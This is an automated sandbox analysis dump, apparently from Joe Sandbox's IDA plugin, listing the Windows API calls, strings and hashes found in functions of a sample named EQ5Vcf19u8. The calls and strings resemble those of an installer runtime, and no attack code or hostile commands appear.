                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectReleaseSelect
                                                                                        • String ID: %H
                                                                                        • API String ID: 1831053106-1959103961
                                                                                        • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                        • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                        • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                        • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                        • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                        • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: DrawText$ByteCharMultiWide
                                                                                        • String ID: %H
                                                                                        • API String ID: 65125430-1959103961
                                                                                        • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                        • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                        • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                        • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                        APIs
                                                                                        • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                        • API String ID: 395431579-1506664499
                                                                                        • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                        • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                        • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                        • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                        Strings
                                                                                        • PendingFileRenameOperations, xrefs: 00455A40
                                                                                        • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                        • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                        • API String ID: 47109696-2115312317
                                                                                        • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                        • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                        • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                        • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                        APIs
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                        • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                        • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileNext
                                                                                        • String ID:
                                                                                        • API String ID: 2066263336-0
                                                                                        • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                        • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                        • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                        • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                        APIs
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                        • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                        • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileNext
                                                                                        • String ID:
                                                                                        • API String ID: 2066263336-0
                                                                                        • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                        • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                        • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                        • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                        APIs
                                                                                        • GetMenu.USER32(00000000), ref: 00421361
                                                                                        • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                        • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                        • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu
                                                                                        • String ID:
                                                                                        • API String ID: 3711407533-0
                                                                                        • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                        • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                        • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                        • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$CallMessageProcSendTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 601730667-0
                                                                                        • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                        • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                        • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                        • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0042311E
                                                                                        • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceEnumFontsRelease
                                                                                        • String ID:
                                                                                        • API String ID: 2698912916-0
                                                                                        • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                        • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                        • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                        • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                        APIs
                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                        • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                        Strings
                                                                                        • NumRecs range exceeded, xrefs: 0045C396
                                                                                        • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$BuffersFlush
                                                                                        • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                        • API String ID: 3593489403-659731555
                                                                                        • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                        • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                        • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                        • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                        APIs
                                                                                          • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                          • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                          • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                          • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                          • Part of subcall function 004063C4: 6F551CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                          • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                          • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                          • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                          • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                          • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                          • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                          • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                          • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                          • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                          • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                          • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                          • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                          • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                          • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                          • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                          • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                        • String ID: Setup
                                                                                        • API String ID: 3870281231-3839654196
                                                                                        • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                        • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                        • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                        • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID: $=H
                                                                                        • API String ID: 3660427363-3538597426
                                                                                        • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                        • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                        • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                        • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID: .tmp
                                                                                        • API String ID: 1375471231-2986845003
                                                                                        • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                        • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                        • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                        • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                        APIs
                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                          • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                          • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
